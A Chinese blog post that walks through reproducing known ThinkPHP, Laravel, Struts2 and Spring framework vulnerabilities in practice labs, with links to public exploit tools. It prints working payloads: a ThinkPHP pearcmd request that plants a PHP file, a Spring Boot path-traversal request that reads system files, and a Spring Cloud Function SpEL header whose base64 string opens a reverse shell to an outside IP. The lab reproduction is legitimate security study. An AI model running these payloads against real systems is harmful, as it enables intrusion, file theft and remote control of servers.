开发框架安全&ThinkPHP&Laravel&SpringBoot&Struts2&SpringCloud&复现

发布于:2025-07-20 ⋅ 阅读:(12) ⋅ 点赞:(0)

PHP-ThinkphpLaravel

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

综合工具:武器库-Thinkphp专检(3-6版本)

如何判断是TP6框架开发的web程序,基于源码、路径、图标、基于报错可发现

dex.php?=xxx 

在其6.0.13版本及以前

/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

图片

图片

2、版本5.X命令执行

其5.0.23以前的版本,5.0.22/5.1.29等

Laravel是一套简洁、优雅的PHP Web开发框架(PHP WebFramework)。

漏洞复现,这里php5.0.23附近的版本可以使用Think的一些工具进行梭哈

图片

图片

图片

CVE-2021-3129 RCE

Laravel<=8.4.2

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

Java-Struct2Spring

ApacheStruts2是一个流行的开发Web应用框架,用于开发JavaEE应用

https://github.com/abc123info/Struts2VulsScanTools

特征是xxx.action之类的文件,直接上工具一键梭哈就行了,就不复现了,其实是vulhub环境除了问题,打不开,这里就偷个懒

图片

偷懒是不可能滴,这里开了一个vulfocus靶场来看一下

Spring-Core-RCE(CVE-2022-22965)

存在于Spring框架以及衍生的框架中,并JDK9.0及以上版本会受到影响

https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE

特征:

图片

直接getshell

图片

图片

SpringBoot目录遍历(CVE-2021-21234)vulfocus

Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。

这里图标就是小树叶,然后看一下

图片

图片

参考:blog.csdn.net/weixin_43165012/article/details/121152482

/manage/log/view?filename=etc/group&base=../../../../../../

SpringCloudFunctionSpel表达式注入 CVE-2022-22963 vulhub

SpringCloudFunction提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。

3.0.0.RELEASE <=SpringCloudFunction<=3.2.2

参考:https://developer.aliyun.com/article/1160011

POST:/functionRouter

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

SpringCloudGateway命令执行 (CVE-2022-22947)

参考:https://cloud.tencent.com/developer/article/2164533

SpringCloudGateway是Spring中的一个API网关。

SpringCloudGateway3.1.x <3.1.1

SpringCloudGateway3.0.x <3.0.7

其他旧的、不受支持的SpringCloudGateway 版本

监控配置不当利用:

见前面Actuator-heapdump利用讲解

这里开一个靶场

图片

这里开一个梭哈工具

图片

ok,这里就已经在跑了

图片

来试一下有没有什么说法,这个工具需要配合jndi来打,只需要把jdni服务器输入里面

图片

图片

综合CVE利用工具:

https://github.com/0x727/SpringBootExploit

https://github.com/13exp/SpringBoot-Scan-GUI

#Python-FlaskDjango


网站公告

今日签到

点亮在社区的每一天
去签到